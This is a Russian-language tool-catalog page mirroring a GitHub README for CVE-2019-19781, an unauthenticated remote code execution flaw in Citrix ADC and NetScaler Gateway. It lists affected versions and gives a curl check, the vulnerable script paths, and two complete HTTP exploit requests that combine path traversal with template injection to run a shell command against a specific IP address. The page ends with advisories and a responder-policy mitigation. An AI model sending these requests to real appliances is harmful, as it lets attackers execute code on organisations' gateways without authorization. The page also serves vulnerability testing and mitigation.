Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-19781 — CVE-2019-19781 - Эксплойт удалённого выполнения кода в Citrix ADC Netscaler | Kitploit
Инструменты/GitHubGitHub/mpgn/cve-2019-19781
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеРеагирование на ИнцидентыИнструмент Удаленного Доступа
GitHubmpgn/cve-2019-19781

CVE-2019-19781

CVE-2019-19781 - Эксплойт удалённого выполнения кода в Citrix ADC Netscaler

Репозиторий
157345 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2019-19781

Удаленное выполнение кода (RCE) в Citrix Application Delivery Controller и Citrix Gateway

Была выявлена уязвимость в Citrix Application Delivery Controller (ADC), ранее известном как NetScaler ADC, и Citrix Gateway, ранее известном как NetScaler Gateway, которая при эксплуатации может позволить неаутентифицированному злоумышленнику выполнить произвольный код.

ПРИМЕЧАНИЕ: Сканер индикаторов компрометации для CVE-2019-19781 от Fireeye -> https://github.com/fireeye/ioc-scanner-CVE-2019-19781/

Затронутые продукты:

  • Citrix ADC и Citrix Gateway версии 13.0, все поддерживаемые сборки
  • Citrix ADC и NetScaler Gateway версии 12.1, все поддерживаемые сборки
  • Citrix ADC и NetScaler Gateway версии 12.0, все поддерживаемые сборки
  • Citrix ADC и NetScaler Gateway версии 11.1, все поддерживаемые сборки
  • Citrix NetScaler ADC и NetScaler Gateway версии 10.5, все поддерживаемые сборки

image

Проверка на уязвимость

root@kitploit:~
TARGET=your_ip
curl -vk –path-as-is https://$TARGET/vpn/../vpns/ 2>&1 | grep “You don’t have permission to access /vpns/” >/dev/null && echo “VULNERABLE: $TARGET” || echo “MITIGATED: $TARGET”

Уязвимый Perl-скрипт

root@kitploit:~
POST /vpn/../vpns/portal/scripts/newbm.pl
POST /vpn/../vpns/portal/scripts/rmbm.pl
GET /vpn/../vpns/portal/scripts/picktheme.pl

Эксплуатация

Для эксплуатации этой уязвимости без какой-либо аутентификации достаточно всего двух запросов!

Первый запрос:

root@kitploit:~
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Host: 3.81.59.87
NSC_USER: ../../../../netscaler/portal/templates/randomletter
NSC_NONCE: c
Connection: close
Content-Length: 103

url=http://exemple.com&title=[%t=template.new({'BLOCK'='print `uname -a`'})%][% t %]&desc=test&UI_inuse=RfWeb

Второй запрос:

root@kitploit:~
GET /vpns/portal/bonclay4.xml HTTP/1.1
Host: 3.81.59.87
NSC_USER: ../../../../netscaler/portal/templates/randomletter
NSC_NONCE: c
Connection: close

image

Подробный анализ (англ.):

  • Craig Young => https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/
  • @MDSecLabs => https://www.mdsec.co.uk/2020/01/deep-dive-in-to-citrix-adc-remote-code-execution-cve-2019-19781/
  • @mpgn_x64 => https://twitter.com/mpgn_x64/status/1214544993261674497

Рекомендации по безопасности:

  • https://support.citrix.com/article/CTX267027

Патч (не настоящий патч)

  • https://support.citrix.com/article/CTX267679
root@kitploit:~
enable ns feature responder
add responder action respondwith403 respondwith "\"HTTP/1.1 403 Forbidden\r\n\r\n\""
add responder policy ctx267027 "HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/vpns/\") && (!CLIENT.SSLVPN.IS_SSLVPN || HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/../\"))" respondwith403
bind responder global ctx267027 1 END -type REQ_OVERRIDE
save config 
Скачать инструмент